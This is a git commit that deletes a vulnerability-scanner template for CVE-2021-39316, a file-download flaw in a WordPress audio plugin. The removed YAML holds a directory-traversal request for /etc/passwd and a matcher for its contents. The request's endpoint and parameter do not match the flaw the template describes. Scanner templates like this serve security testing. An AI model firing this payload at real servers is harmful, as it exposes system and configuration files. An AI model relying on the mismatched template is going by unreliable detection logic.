Delete CVE-2021-39316.yaml

2022-02-28 22:31:33 +05:30 · 2022-02-28 22:31:33 +05:30 · 43d242e195
parent 9aa861f09a
commit 43d242e195
1 changed files with 0 additions and 25 deletions
--- a/cves/2021/CVE-2021-39316.yaml
+++ b/cves/2021/CVE-2021-39316.yaml
@ -1,25 +0,0 @@
-id: CVE-2021-39316
-info:
-  name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
-  author: pussycat0x
-  severity: high
-  description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the dzsap_download action using directory traversal in the link parameter.
-  reference: https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
-  tags: lfi,wordpress
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.50
-    cve-id: CVE-2021-39316
-    cwe-id: CWE-22,CWE-552
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd"
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - "root:.*:0:0"
-      - type: status
-        status:
-          - 200